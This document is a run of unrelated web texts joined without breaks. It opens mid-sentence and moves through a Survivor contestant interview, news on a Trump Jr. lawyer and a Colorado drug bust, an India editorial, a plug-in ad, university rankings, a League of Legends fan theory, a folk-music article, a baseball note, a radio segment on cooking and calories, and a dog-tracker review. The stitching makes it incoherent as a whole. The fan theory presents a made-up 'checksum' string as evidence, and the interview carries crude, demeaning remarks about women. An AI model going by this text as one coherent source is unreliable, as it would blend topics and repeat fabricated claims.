nothing wrong and that he fully supports her. Johnson said he personally approved the police report that she filed after the arrest. Currently, Green, is looking for a new job as a police officer. She also serves as a volunteer firefighter and is currently taking classes to become a paramedic.
NOTE: XFINITY.com is the place to be for all of your “Survivor: Worlds Apart” scoop! I delved deep into the Nicaraguan wilderness on a mission to bring you all kinds of stuff including behind-the-scenes tidbits, pre-game interviews with the cast, insights from “Survivor” host Jeff Probst and Challenge Producer John Kirhoffer, a look at the first Tribal Council, and much more. I'll be cranking out this goodness daily in the weeks leading up to the premiere, so be sure to follow me on Twitter (@gordonholmes) for up-to-the-minute updates on all of this season's “Survivor” fun.
Name: Rodney Lavoie Jr.
Age: 24
Current Residence: Boston, Massachusetts
Occupation: General Contractor
Gordon Holmes: Your inspiration in life is a gentleman by the name of Tom Brady, quarterback for the New England Patriots. And, you refer to his wife Gisele Bundchen as a “slampiece.”
Rodney Lavoie Jr.: (Laughs)
Holmes: Could you do me a favor and define the word, “slampiece”?
Lavoie: No, she's a dimepiece!
Holmes: Alright, the bio I was handed says, “slampiece.” What is a dimepiece?
Lavoie: You can be good looking, but you've got no personality. You've got no gift for gab. But she's a businesswoman, she's a superstar, she's a model. And you can tell she's not one of those trashy pigs who's sleeping with everyone. She's with Tom Brady. She's with the G.O.A.T. Those two are like lamb and tuna fish. They're grilled cheese and a (expletive deleted) cup of (expletive deleted) joe.
Holmes: So, dimepiece is the highest possible compliment. Where did “slampiece” come from?
Lavoie: That bio must be wrong. Brady, I ain't calling your girl a slampiece.
Holmes: Watch Brady's a huge “Survivor” fan and is going to come after you.
Lavoie: (Laughs) Yeah, he's like, “This (expletive deleted) kid!”
Holmes: So, you're not a big “Survivor” fan. How'd you get dragged into this mess?
Lavoie: I was at “The Hero” casting for the Rock and they're like, “Listen, ‘Survivor' is for you.” And it's actually better because people who have seen all the seasons, they think this strategy will work or this strategy will work. I'm coming in with a fresh mindset. I'm coming in with my strategy and how I do (expletive deleted). Not how three seasons of people play the game.
Holmes: So, you think it's better to trust your instincts than to know what's worked in the past?
Lavoie: I think this game is all instincts. It's a mixture of instincts and luck. It's like a football game, if it bounces your way you're going to win the game. You're going to get hit, and you've got to get back up.
NOTE: Rodney had writing on his hand.
Holmes: What's going on with your hand there?
Lavoie: I've just got some notes for the interview. (Laughs)
Holmes: You're not trusting your instincts?
Lavoie: (Laughs) I'm always prepared.
Holmes: You've seen your competition. Are you comfortable deceiving them?
Lavoie: I'm a (expletive deleted) salesman. My product…there's 150 other people who sell it, and maybe they can sell it cheaper. Why do they go to me? Because they trust me. They know I'm going to bang the job out the right way.
Holmes: Do you consider yourself a good liar?
Lavoie: I'm a great liar.
Holmes: Tell me about these tats.
Lavoie: This is “The King.” Cause what does a king do? He runs (expletive deleted). He ain't a follower. I never followed anybody my entire life. I got this when I was sixteen. I've been hustling, I've been grinding since I was sixteen. Anybody who sees me, they look up to me and they respect me. That's how I grew up. When I was younger, say I banged my knee on a rock? My father would see me crying and he'd be like, “Are you bleeding? No? Then get the (expletive deleted) back up. You (expletive deleted).” That's how I was taught. There are no tears. One of the guys said that 80% of the people cry on this show. You're not going to see a single tear out of me.
Holmes: On your left you have tattoos of your father and your mother. Are they still around?
Lavoie: Yeah. My grandfather was a World War II hero. He was over in Italy and he saved over 51 men who were trapped. There's a street named after him back in my hometown. He's one of the realest dudes you'll ever meet. My mother was 19, and my grandfather died. A year later, my grandmother died. So I never got to meet them. My mother lost both her parents and she had my brother. She was by herself. She's one of the realest people I've ever met in my entire life. She's a soldier. So, I got this tattoo because you only have two parents and you never know when they're going to go. I was a young kid and that's how wise I was. I'm not going to put something (expletive deleted) on my arm. I'm going to put my family on my arm.
Holmes: And what's the tattoo on the inside there.
Lavoie: That's my sister. I found her dead two years ago.
Holmes: That's Natalie?
Lavoie: Yeah.
Holmes: If you don't mind going into this; what happened?
Lavoie: The tattoo says, “Dear Natalie, even though I'll never see you again, you'll always be my big sister. Love Bubba.” That's a nickname she used to call me. She was a lesbian. I was at one of the first gay weddings ever. They were playing (Sings) “I kissed a girl and I liked it!” And I had a great time. I had my shirt off, I was grinding with her fiancee's mother. It was a great time. Shortly after that she moved to New Mexico. And she didn't tell us, but she was living on the streets of New Mexico because they broke up. She didn't tell us that. She was living in her car, she was doing drugs. So, she finally called my father and came back home. And one day we go to knock on her door. No answer. So, me and my father break through the window and we see my sister face down on the ground. She must've choked on her vomit, smoked some crack. It's tough, man. People ask if I can survive out here. I say, “You got a sister? You got a mother or a father? You ever pick them up to see their dead body?” Until I got this tattoo I didn't shed one tear because I had to stay strong for everybody. I'm a strong (expletive deleted). If you come after me, bring a hammer and knock me the (expletive deleted) out. You talk (expletive deleted) about my family? I'm coming after you.
Holmes: I can't even imagine that.
Lavoie: It all stems from who you're raised by. I was raised by an awesome mother. Her mother wasn't there for her.
Holmes: How does your mom feel about you being out here?
Lavoie: (Laughs) My mother, when they took my phone, she was like, “Don't hang up! Leave a voicemail!” She thought I was going to Iraq to fight the war. She didn't want me to go. She's happy for me, but she's going to miss her baby boy.
Holmes: Her baby boy is going to be around some attractive women in the near future. Are you open to flirting to get ahead?
Lavoie: When you look on the Internet, people who watch pornos…
Holmes: There's porn on the Internet?
Lavoie: (Laughs) That's good. The number one thing you see is someone (expletive deleted) their college professor. I banged my professor.
Holmes: C'mon, Rodney. “Made love” to your professor. Let's keep it classy.
Lavoie: (Laughs) She was awesome. She was a good girl. She took care of me. She calls me “The Italian Stallion.” I also banged my babysitter. Older women love me for some reason.
Holmes: Whoa…back up. Your babysitter? How old were you?
Lavoie: I was like 17 or 18.
Holmes: OK…so it wasn't like you were literally in need of a babysitter at the time.
Lavoie: (Laughs) Yeah! It wasn't like I was twelve.
Holmes: You ever go camping?
Lavoie: Not really. My idea of camping is you go see the Red Sox, you see the Patriots. You go to New Hampshire and you've got jet skis and a lake house. It's going to be funny to watch me adapt to that kind of (expletive deleted) because that's not my lifestyle.
Holmes: If there is a twist this season, what do you think it'll be?
Lavoie: You've got special idols. Maybe they'll send a past player back on the show. There could be something with the merge. It's like Jeff says, they keep the format, but they want to keep you on your heels. I've just got to adapt once it happens.
Holmes: If you could align with any past player, who would it be?
Lavoie: It would be Russell or Boston Rob. If I'm looking for an idol, I'll be like, “Oh, I was looking for my earring piece.” Rob would do stuff like that. But other than that we're not alike. I'm good at hiding what I'm really doing. I'm aware of everything that everyone is doing.
Holmes: Leaders don't fare very well on this show. They tend to be the first target. You've got a big personality. Are you worried about falling into the leader role or would that be something you'd pursue?
Lavoie: I sell Jordan sneakers back home. I have kids who don't even make a profit line up outside of the mall. I have 20 of them buying sneakers for me. I hand them the money and they buy them for me. They resell for a lot of money. Now there are no more sneakers left in the mall. Now they're in my (expletive deleted) trunk. I'm the store. Instead of them being $150, I make a thousand or two off of each pair.
Holmes: Wait, how are these kids not making a profit?
Lavoie: They respect me. They love me. I give one kid $100 and he gets all of his crew and I hook them up with beers…lounge chairs…a turkey sandwich. I take care of them.
Holmes: These kids need an agent. If you're making thousands, I'm gonna want more than a turkey sandwich.
Lavoie: (Laughs) I've got a good personality! I can convince someone to do something so dumb, but I make it sound so good. I'm gonna give the camera the real Rodney, but when I play the game I'm gonna fall back. I'm gonna let everyone else dig their holes. You see people telling people what to do. Who's the whack job?
Holmes: You're going to have to be way more specific.
Lavoie: Phillip. He's all up on people. You're in the heat and you're frustrated. You've got to lift people up. I remember it was three days out and the girl at Tribal says she wants cookies. Malcolm answered it perfectly. He said, “You know what? It may not have been my answer, but that'd be nice.”
Holmes: What do you think of your future tribemates?
Lavoie: I'm very comical. I love busting people's balls. You've got Mike Tyson, the girl with the face tattoo. You've got Colonel Sanders with the beard. Harry Potter's grandfather. You've got Pocahontas with the (expletive deleted) feathers in his hair. With his food he does this trance thing every time he eats. Some weird cult stuff, I don't know what he's doing. You've got the two older women who I love. Mark it down, I think me and them are going to pair up. I've got a solid two in my back pocket. Older women have experience. They've got to last longer. The young women after five days? The estrogen is going to boil up. And they're not ready for this game. I can tell these girls are real soft.
Holmes: So no potential professors or babysitters?
Lavoie: I think they picked the perfect cast for me not to fall in love with any of these broads. They're so mediocre, it's not even funny. There's no (expletive deleted), there's no (expletive deleted). So I'll be flirting, but I'm not into these broads at all.
Don't miss the 90-minute premiere of “Survivor: Worlds Apart” on Wednesday, February 25, 2015 at 8 pm ET on CBS.
The opinions expressed are solely those of the author and do not necessarily reflect the views of Comcast.
Washington (CNN) Alan Futerfas is a New York-based criminal attorney with who has frequently represented clients in organized crime and cybersecurity cases -- and he's also the new lawyer for Donald Trump Jr.
Trump Jr., under increased scrutiny amid revelations that he met last year with a Russian lawyer pertaining to "information that would incriminate" Hillary Clinton, has hired Futerfas to represent him. While in law school, Futerfas worked for attorney Jay Goldberg, who also represented Donald Trump in his previous divorce cases.
When news first broke of Trump Jr.'s involvement in the pre-election meeting with a Russian lawyer, Futerfas said in a statement that it was "much ado about nothing." The statement also called the period of May to early June 2016 "an intensely busy time" for Trump Jr.
"The meeting lasted about 20-30 minutes, and nothing came of it," Futerfas said Monday. "His father knew nothing about it. The bottom line is that Don Jr. did nothing wrong. I have been representing people in investigatory matters for almost 30 years, and I see nothing here."
It is true that in Futerfas' long career he has represented a number of people, including many with mafia ties.
In the 1990s, Futerfas, along with his associate Ellen Resnick, represented a number of defendants accused of participation in the Colombo war -- a series of murders that happened within the mafia family from 1991 to 1993.
A year later, Futerfas opened up his own practice, a small law firm in New York that focuses on white-collar investigations and prosecutions. According to his law firm's website, he has also lectured on ethics and other topics at Benjamin N. Cardozo School of Law and has lectured on ethics and corporate investigations for the National Association of Criminal Defense Lawyers.
According to the site, in his spare time Futerfas plays the bass trombone and is part of the Park Avenue Chamber Symphony.
Futerfas has a long history of representing clients with alleged ties to organized crime, including the Gambino, Genovese and Colombo crime families. Last year he represented a father and son duo who were found guilty by a federal jury in Brooklyn of a number of drug charges tied to the Italian mafia. In 2002 he represented a member of the Genovese crime family who was sentenced to 3 years in prison on racketeering charges.
A search of articles also shows Futerfas' name in association with cyber-linked cases.
Last year, he represented a Russian man who spent three years and was ordered to pay nearly $7 million for creating a computer malware known as Gozi. In 2015 Futerfas represented a man who was charged with what was dubbed by prosecutors at the time the largest theft of consumer data from a bank in history.
Fourteen people were arrested in the Pikes Peak region during three narcotics investigations linked to Mexican cartels within the last year.
Each of the three investigations were conducted during the last 10 months. They resulted in seizures of heroin, cocaine, methamphetamine and marijuana with a total estimated street value of $5,630,000. Several vehicles were also confiscated.
The first case led to the seizure of 6.8 pounds of heroin, 10 pounds of methamphetamine, 2 pounds of cocaine and six vehicles. This work in Colorado Springs led to other investigations in seven states and Mexico, the Colorado Springs Police Department reports.
It also led to a second local investigation. In that, investigators learned of an unrelated heroin trafficking cell in Colorado Springs and Pueblo. Two Colorado Springs residents were arrested while allegedly driving a load of 4 pounds of heroin and a quarter-pound of cocaine to the area from California.
Investigators also searched a connected apartment in Colorado Springs, where they found another quarter pound of heroin and confiscated three vehicles.
The third investigation started with a Homeland Security investigation and was not directly connected to the others. It led to the discovery of 600 pounds of marijuana inside a stash house in Denver and the confiscation of two vehicles.
Five of the suspects arrested in these cases were in the United States illegally, CSPD reports.
CSPD Metro VNI Commander Thor Eells called the connections to Mexican cartels in each case an "alarming thread."
Eells added that he was concerned other drug distribution cells may try to take the place of those that were busted in these investigations.
"All of us are surprised at the large amounts of heroin that are being trafficked," Eells said. "That, in my career... it's a lot of heroin."
According to CSPD, the investigation included cooperation with FBI, DEA, Homeland Security, the El Paso County Sheriff, Pueblo Police Department, the Pueblo County Sheriff, State Patrol and the Denver Police Department.
The individuals arrested in this case are identified as:
Juan Ramon ESPINOZA-ALDANA (Allegedly an Illegal immigrant)
Javier FRANCISCO-JIMENEZ
Maria Isabel MENDOZA-PALACIOS
Guadalupe MARGUEZ-CHAVEZ
Ernesto MATA-ROTAS
Angel Eduard NUNEZ-RIVERA
Mario Alberto DOMINGUEZ-OROZCO
Cesar SOTELO-LOPEZ
Jacinto PONCE-AMPARO (Allegedly an Illegal immigrant)
Matias ALEMAN-SANCHEZ (Allegedly an Illegal immigrant)
Miguel Angel GAMBOA-TASSO (Allegedly an Illegal immigrant)
Enrique CUEVAS-DEL TORO
Zakariya Angel SALAZAR
Leo RIOS-LUCERO (Allegedly an Illegal immigrant)
The North Carolina legislature voted Wednesday to override Gov. Bev Perdue's (D) veto of the state budget, which includes provisions to strip Planned Parenthood of its federal funds.
The state Senate voted 31-19 to override the veto Wednesday afternoon, after the House passed a similar measure late Tuesday night in a vote of 73-46, according to the News and Observer.The budget prevents any state or federal funds from going to Plan Parenthood facilities, which Planned Parenthood officials say amounts to about $400,000 in funds, and will go into effect on July 1st.
The provision was added to the budget by abortion opponents who don't want any federal funds going to entities that perform abortions. As Planned Parenthood officials are quick to point out, federal law already bars any federal funds from being used to provide abortions. The federal dollars that go to Planned Parenthood are used to provide other health care services to women.
Indiana and Kansas have also passed similar laws stripping state Planned Parenthood facilities of their funds — though Indiana's is being contested by the federal government, which argues that it illegally blocks Medicaid recipients from receiving health services from Planned Parenthood. North Carolina's law doesn't block the funds from going to Medicaid recipients.
INDIA HAS a reputation as a place where needed government action comes slowly, if it all. This fault is often blamed on the country's democracy, which is said to be ineffective compared to the authoritarian regimes of China or Russia. On Sunday, however, the coalition cabinet of Prime Minister Manmohan Singh ratified a landmark package of laws dealing with sexual violence, just 56 days after the brutal gang rape of a 23-year-old woman on a New Delhi bus. The reforms fall short of what is needed and must be seen only as the beginning of a struggle to protect women from rape, trafficking and other abuses. But they also demonstrate why India's political system can respond in a way unthinkable in Beijing or Moscow.
The new laws came about not because they were priorities of Mr. Singh or the political elite but because the violent attack on the woman, who later died of her injuries, prompted an uprising by angry Indians, many of them young women and men of the growing urban middle class. When they took to the streets in December, they were greeted by hostile police and callous politicians. But India's free media quickly took up their cause.
The pressure prompted the government to put the trial of the suspects in the rape on a fast track and to appoint a special three-member committee of jurists to examine the broader issues. Last month the panel came back with a searing, 200-page report that lambasted police and politicians and a sweeping demand that India “change the way in which women are treated.”
The package ratified by the government included a number of legal reforms suggested by the committee, including tough penalties on newly defined offenses such as stalking, voyeurism, acid attacks and trafficking. Bowing to a popular demand, the cabinet also instituted the death penalty for rape cases where the woman dies or is left in a vegetative state. Police would be required to include female officers in all interviews of rape victims.
The cabinet failed to agree on some recommended — and needed — measures, such as the criminalization of marital rape and sexual crimes committed by military personnel. Parliament, which will take up the package this month, will have the chance to add those provisions, but legal changes are just the beginning of what is required. The harder stuff includes a top-to-bottom reform of corrupt and poorly trained police forces and a shift in entrenched cultural attitudes.
India has nevertheless shown how its political system can respond to an urgent popular demand for change. The same could certainly not be said of China, where protests over problems including food contamination and illegal land seizures have been suppressed rather than listened to, or Russia, where the regime has set out to eliminate grass-roots citizens' movements. As for the United States, the Sandy Hook Elementary School shootings occurred two days before the New Delhi rape; whether our political system will respond to the subsequent outcry remains to be seen.
"F@*ks with the Fabric of Time"
The H910 Harmonizer® was the world's first digital effects processor. With its unique combinations of pitch shifting, modulation and delay, the H910 can be heard on countless ground-breaking works by artists from AC/DC to David Bowie to Frank Zappa. Simply put, nothing sounds quite like it.
A powerful creative tool, the H910 plug-in is a faithful recreation of the original hardware. Use the H910's pitch changing ability to create specific musical intervals and perfect harmonies, spread guitars, fatten snares, apply subtle organic de-tuning to synths or add slap-back delays to vocals. At extreme settings, you can create unheard-of mechanical sounds, drone effects or robot language using self-oscillation, delay, and anti-feedback.
Two is Better than One
When you purchase the H910 Harmonizer® plug-in, you also receive Eventide's exclusive H910 Dual Harmonizer®. This version recreates the popular technique of running two H910 units in parallel to create lush doubling and other interesting effects.
The latest ranking issued by the Scientometrics Lab of Information Technology University (ITU) show that no Pakistani university has made it to the top 30 institutes of the Muslim world in quality research.
ITU Quality Research Rankings (ITU-QRR) provide analytics of more than 450 universities and institutes of the Muslim World to benchmark research performance across 250 plus subject areas for the purpose of strengthening the quality and impact of research.
King Abdulaziz University, Saudi Arabia, topped the list with a score of 10.82, followed by University of Malaya, Malaysia, with a score of 10.31. The score is calculated on the basis of the highest quality of publication. Most of the top 20 varsities are from Saudi Arabia, Turkey, Iran, and Malaysia.
Pakistan's Quaid-e-Azam University (QAU) is 35 on the list with a score of 3.21, followed by COMSATS Institute of Information Technology with 2.83 score, University of Agriculture, Faisalabad with 1.89 score and National University of Sciences and Technology (NUST) with 1.44.
The rankings are divided into two categories. The broad institutes that are research active in more than eight disciplines while specialized institutions are research active between three to eight disciplines. Two of Pakistani universities are among top 20 of Muslim countries in the category of specialized institutions. Agha Khan University is in 6th place and Pakistan Institute of Nuclear Science and Technology is in 13th place with 3.48 and 2.46 score, respectively.
Saeed-ul-Hassan, director at the ITU's Scientometrics Lab, said, “The publications in top five percentile of normalized impact factor of journals and conferences in across subject categories are taken as highest quality publications. In addition, the ranked outlets, A* and A, from ERA CORE 2014 is also used to assess publication quality. Subject areas are organized into a hierarchy with 16 broad level and 250 plus detail level categories,”
None of the universities from the Muslim world are even near institutions of the non-Muslim countries in terms of quality research. ITU-QRR uses Harvard University as a benchmark with a score of 100. The top university from Muslim world got a score of 10.82 as compared to the 100 of Harvard University.
Umar Saif concluded by saying, “This ranking presents a data-driven, independent and quantified yardstick on where our universities stand in terms of research output. Ranking of Pakistani universities should be a wake-up call for us.”
Source: The News
× TechJuice for Browser: Get breaking news notifications on your browser.
Read carefully before you judge:
It is Shaco.
Here's why:
Six S: Six Skins, Shaco has 6 Skins
Hide: Obvious
Assasin: Yes
J: Jack in the Box
Here's a Screenshot of Morello posting on his Twitter. About a few minutes later, he deleted the post again because it was kind of too obvious.
http://gyazo.com/63aec180a2164e2459ee4010eaae2e6d
"The Joke's on you" - Riot has given a lot of cheesy misinformation, making fun of the community, that's why the joke's on us.
Another joke that is on us is that the 4th letter "a" is in the "recall" ability - another hint for Shaco.
"Skin Deprived" doesn't only mean lack of Skins, but also that somone is not having a (human) skin anymore. That is because Shaco skins his opponents after he kills them, as it is written in his plot.
Now you may ask, what is up with this "541daw6s5d41a6s5d" number? Some people saying it is the the wasd keys, telling you the location of the champion. Well, again you have been fooled. The new Loading Screen Animation is already in progress and the file is already in the newest PBE Patch( here: )
http://gyazo.com/f327cdfa6255958fc68bb84d22568bd9
If you open the file in a hex editor it has this content:
http://gyazo.com/b9baa6a62b44d1ec1038e49eb343be78
The 541daw6s5d41a6s5d is the checksum of the unfinished Animation File for the Login Screen. (A checksum is a unique control structure that belongs to the file to check wether it's correct or have been modded, so that the launcher can re-install it in case it's corrupted)You can see it in the top of the file, just as you can see the ActionScript calling of the Shaco Login Animation. Now why would you do a Shaco Login Screen? Riot only does this for new champs, and since Shaco is already released, it's the Ultimate Skin.
Another super huge hint:
http://forums.euw.leagueoflegends.com/board/showthread.php?t=541daw6s5d41a6s5d Here's a beta Screenshot of a Shaco gameplay. Now, the special thing about it. Check the URL! The ID of the Thread is, exactly, 541daw6s5d41a6s5d.
It is Shaco. Let the upvote begin!
The album, assembled by his musician sons, Calum and Neill, features covers of Mr. MacColl's best-known songs, the foremost being “The First Time Ever I Saw Your Face,” which Roberta Flack turned into the No. 1 song of 1972. (Naturally, Mr. MacColl despised that version, considering it elaborate and labored.) The set showcases Steve Earle rendering an appropriately disheveled “Dirty Old Town,” a song recorded by stars from Rod Stewart to the Pogues. There are also pointed and austere performances from Rufus Wainwright, Billy Bragg, David Gray, Jarvis Cocker and more, covering the songwriter's classics from “The Shoals of Herring” to “Moving On Song.”
In many of his songs Mr. MacColl cast working people — miners, whalers and factory employees — as heroes and muses, and he wrote often of Gypsies and the displaced. His elevation of the working class reflected political beliefs that were inseparable from his art. He grew up in soot-choked Salford, England, the even wronger side of the river from Manchester; his Scottish-born father was an iron molder and both parents were socialists who instilled in him an unshakable adherence to leftist politics. Early on, he wrote an ode to Stalin; later, he identified as a Maoist.
Even in those polarizing worlds, Mr. MacColl could stir special trouble. “He joined the Communist Party three or four times — and got kicked out three or four times,” Ms. Seeger said in a phone interview from her home in Oxford, England. “He kept trying to comment on how imperfect a lot of the leadership was.”
Mr. MacColl's earliest efforts to erase the line between art and politics centered on drama. In 1931, he created an agitprop theater group called the Red Megaphones, which later became Theater of Action. There, he met the first of his three wives, the theater director Joan Littlewood. He was 30, with a long history as a playwright and actor, when he changed his birth name, James Miller, to Ewan MacColl and devoted himself to folk. He believed music could be more effective than theater at spurring people to political action.
Mr. MacColl brought to folk a new urban focus. “The first wave of the folk revival, from the late 19th century, had a nostalgic view of rural England that didn't reflect the industrial tradition,” said Rob Young, author of the folk history “Electric Eden.” “People like MacColl and Peggy Seeger led a second-wave revival, which stopped folk from becoming a nostalgia industry for the middle- and upper-middle classes,” Mr. Young added. “They gave it vitality.”
From Chronicle Staff Writer Susan Slusser at PNC Park
The Chronicle has learned that Sonny Gray, the A's top pitching prospect, will be joining the team, likely to pitch out of the bullpen initially.
UPDATE: Manager Bob Melvin confirmed that Gray is coming up, with Dan Straily not needed until after the break (see below). Gray will indeed “get his feet wet,” Melvin said, by pitching in relief.
Gray, 23, was the A's top pick in the 2011 draft out of Vanderbilt. He was scheduled to start at Colorado Springs tonight, but he was replaced by Chris Resop for tonight's game.
Gray is 8-5 with a 2.81 ERA and he has 107 strikeouts and 34 walks in 102 1/3 innings. Many scouts have said since Gray turned pro that he'd make an outstanding reliever; many like him better in that role than as a starter, although I can't imagine the A's are thinking of this as a long-term proposition for Gray. The whole key to the A's success with a limited payroll is developing starting pitching, and they have a good one in Gray; I believe this to be a get-your-feet-wet stint in the bullpen while the A's can carry an extra reliever.
As for a corresponding move, Dan Straily, tonight's starter, won't be needed again until July 23, so it's likely he'd be getting extra work at Triple-A Sacramento in the meantime.
He will be the second first-round pick to join the A's this week; 2009 first-rounder Grant Green came up Monday and made his major-league debut, playing second base in the A's 2-1 win last night.
There are no indications at this point that Gray will join the rotation any time soon; Jarrod Parker's right hamstring was OK for his last start at Kansas City and he is scheduled to pitch Friday against Boston.
All-Star Bartolo Colon has ties with the Biogenesis Clinic being investigated by Major League Baseball, but Colon already has been suspended for failing a drug test last summer and it's unclear if there will be suspensions applied to players who already have served them for what might be, in essence, the same infraction.
Robyn Williams: Today we kick off with one of those reminders that those in charge can so often miss out on the obvious, like when is a calorie not a calorie? The prompt comes from Richard Wrangham, Professor of Anthropology at Harvard.
Richard Wrangham: About 15 years ago my colleagues and I, as biological anthropologists, started realising that there was something very different about human and non-human diets in the sense of food processing being so universally important in humans, and, in the form of cooking at least, being completely unimportant in the diets of any other species except possibly some of the domesticated species.
And as non-nutritionists we then wanted to find out what was significant about cooking in human diets. We were amazed to discover that there was very little work indeed that summarised the importance of cooking for providing energy since, as animal biologists, we expected that energy would be the principal nutrient that was really limiting and important from the point of view of food choices and food preferences among creatures living in the wild. We wanted to find out what we could, and that led to a series of experiments in my lab that Rachel Carmody will describe.
Meanwhile, what we discovered is that if you go to the food labels and you go to the food tables the, as it were, official conclusion is that there is no difference between cooked food and raw food in the number of calories it provides. And what we in fact find is that there are all sorts of evidence that there is a big difference. So we wanted to convene a symposium in which we would explore the differences between raw and cooked food to some extent, but more generally the failures of the Atwater system in understanding the significance of caloric differences in foods.
Rachel Carmody: My role in the symposium is to sort of integrate these ideas. I'm looking at the energetic consequences of food processing. And the data is derived from a series of experiments that my collaborators and I have conducted over the last several years, the first of which was something we published a couple of years ago in PNAS where we fed mice diets of beef or sweet potato that had been processed in different ways.
And we were curious to know, is a calorie? And if that's the case then Atwater would have predicted that regardless of how these pieces of beef or sweet potato were processed, mice should gain weight the same when you account for differences in food intake and activity. But what we observed is that the mice who were eating the processed diet were fatter. They grew heavier than those that were eating the unprocessed items, and this is after controlling for differences in food intake and activity.
And so this led us to challenge the idea of the Atwater convention, and what we did was we calculated out the effective additional energy that was extracted from these processed diets, and we found that although Atwater predicts no difference with processing, cooking increased energy gain from beef by about 15%, and cooking increased energy gain from the sweet potato diet by 39%. And these differentials are not currently being reflected, either in the scientific literature or in the nutrition labels that are being presented to consumers.
So what we've begun to do on the back of this kind of study is to go in and say, well, if the Atwater system misestimated these effects, then it must be that there are things missing from the Atwater system. So we've gone in, we've started to probe the effects of food processing on bioavailability and on diet-induced thermogenesis, but essentially the short message is that by improving our estimates of bioavailability and our estimates of diet induced thermogenesis I think we could bring the Atwater system more in line with energy gains that are observed in the human body.
Robyn Williams: Rachel Carmody from Harvard. And the Atwater system, as you'll have inferred, is an index of energy and food, how much grunt in your grub. Going back to the 19th century, that system. But as Richard Wrangham says, it seems incredible that it took anthropologists studying cavemen to show up this anomaly.
Let's go back to what made you look at this question of calories in the first place. You were examining the way fire affected human beings way back. Was that the inspiration?
Richard Wrangham: Well, the inspiration actually was the fact that as a primatologist I studied chimpanzee feeding behaviour and I was thinking about the fact that chimpanzees represent a pretty good model for the kind of ape that would have given rise to the hominin lineage that gave rise to humans, and I often used to try and eat the chimpanzee foods, and I discovered that this was entirely inappropriate. I couldn't possibly survive, even for a few days, on chimpanzee foods.
And then it occurred to me that what was really important about human foods is that we cooked them, and that's what led me to try and find out what it is that's different between cooked verses uncooked foods, and this astonishing realisation that if you look in the official food tables there is no difference between the amount of energy you get from cooked and raw.
Robyn Williams: Of course one of the great things that you've talked about before is the ways in which having more energy from this cooked food, going back a million years, a million and a half years, certainly the whole of modern human history, is that we could then use this extra energy for things like growing a big brain, not that that wasn't necessarily the intention, but...
Richard Wrangham: Yes, not the intention at all, exactly, but hugely important. And in the last few years it's emerged ever more strongly that the human brain needs such a high rate of glucose flow that people find that you cannot sustain it on the basis of raw foods. What cooking does is to soften foods and enable you to chew it so quickly that it gets into the body fast. If we had to chew raw food at the rate that would be needed to fuel brains of our body size, we would be chewing for 12 hours a day and it would just be impossible.
Robyn Williams: Why is it that the official guides don't recognise this? They assume a calorie is a calorie is a calorie, to quote Gertrude Stein perhaps, and that there is no effect as you describe it. It seems unbelievable.
Richard Wrangham: One of the big things is that our official system does not take account of the cost of digestion, of the fact that when you eat your food then your body is paying all sorts of costs from the chewing, all the way down to the production of enzymes, the production of acid and the cost of transport across the gut wall. There's simply no account of that taken. And raw foods cost a lot more than processed foods. So why wasn't that done? I don't know enough about the history to really understand that. There was some appreciation of the fact that foods did cost something to digest. I think that a large part of it was that cooked foods tend to be fairly similar in how much they cost and people were not interested in raw foods.
Robyn Williams: Yes, it's interesting you say there's a difference between the sort of bread that you eat. Could you give me that example?
Richard Wrangham: There was a study published a couple of years ago suggesting that the difference between the cost of digestion for a multigrain bread sandwich with cheddar cheese versus white bread sandwich with American processed cheese was something like 64 calories difference as a result of the increased cost of digestion for eating multigrain bread and cheddar. So this suggests that even relatively small differences in processing, not cooked versus raw but multigrain versus white bread, could add up to a great way to slim.
Robyn Williams: So you actually get more calories from the white bread?
Richard Wrangham: Yes, you get more calories from the white bread as a net consequence because even though the total number of calories entering the body is the same, the cost of digesting the multigrain bread is so much greater.
Robyn Williams: How have you been following this up?
Richard Wrangham: Well, the traditional way of looking at the costs of digestion has been with the ideal animal model, which is a python. And Stephen Secor has been doing fantastic work in his lab in Alabama because pythons don't move at all and you just give them anything and put it into their cage and they will eat it, and after that you can measure the results very easily. But no one has measured the cost of digestion in mammals using cooked and raw food. So that's what we've done in our department. Rachel Carmody has led a study in which she has shown that rats are paying a greater cost to digest raw food in the form of raw meat than cooked meat, or raw sweet potato than cooked sweet potato.
Robyn Williams: A big difference?
Richard Wrangham: Yes, differences range from about 10% to almost 40%. And so this suggests that mammals in general would do this. We think that it's going to apply to humans, but that's the next level.
Robyn Williams: A final question. Now that you've sort of stirred the possum, do you expect the food industry to take notice of the fact that the calorie is not a calorie but they have to differentiate and make it plain to customers?
Richard Wrangham: I'm sure there are all sorts of huge reasons for inertia in the food industry, and nobody wants to be the first to make a move here. But I do think that we can add to the growing public interest in getting an increasingly accurate system of measuring calories. After all, there are companies like Weight Watchers that already acknowledge the fact that there is some difference between foods in the cost of digestion and therefore recommend the ones that are less processed. We can add to that by encouraging people to do the research that will quantify the effects better and slowly build a political movement that will lead to some kind of improved system of calorie assessment.
Robyn Williams: Thank you very much.
Richard Wrangham: Thank you.
Robyn Williams: Richard Wrangham is Professor of Anthropology at Harvard, and we had him talk about that chimp diet before and revealed but it's not just unending luscious fruit picked from trees but gritty, chewy, un-luscious stuff you wouldn't give a second glance.
FitBark Review 2017 – The FitBark is a dog activity tracker designed for dogs (or other willing pets). We were recently fortunate enough to test and review a FitBark, so we invited the charming English Bulldog, Humphrey (pictured above), to be our test subject. He agreed.
The small wearable device attaches directly to the dog's collar and then communicates (via Bluetooth) to the FitBark app on your smartphone.
The FitBark currently comes in 7 colors: Grey, Purple, Red, Black, Blue, Green, and Pink.
Think of it as the ubiquitous Fitbit for dogs. Although the device is primarily marketed for dogs, the FitBark could hypothetically work for any pet who wears a collar.
Just like the Fitbit, the FitBark tracks activity levels, patterns, and can help you set goals for your furry friend.
This is what we learned after a week of testing, observation, and review of the FitBark activity tracker. We'll cover everything from initial setup to results including learning that Humphrey averages 15 hours of rest per day.
FitBark: What's In The Box?
FitBark Device Rubber bands for attaching to collar (compatible with collars not wider than 30mm or 1.18 inches) Micro USB charging cable
Our initial reaction when the FitBark arrived was that the device is a lot smaller than expected. Although this didn't matter too much for Humphrey, it is nice to know that the device can be used on dogs (or cats) of all shapes and sizes.
The FitBark easily attaches to a standard dog's collar via the rubber bands which are included with the device. We attached the device to a neck collar rather than Humphrey's larger, harness-type of collar.
A few days into using the FitBark one of the rubber bands snapped off. This caused the FitBark to fall onto the floor. We happened to see the device fall off and were able to retrieve and reattach the device using the remaining rubber band.
This could have been very bad for the simple fact that Humphrey would have turned the FitBark into a FitSnack. He chews everything in his path.
FitBark: Mobile & Web App
The initial setup of the FitBark involves downloading the mobile FitBark app from the App Store (iOS) or Google Play (Android).
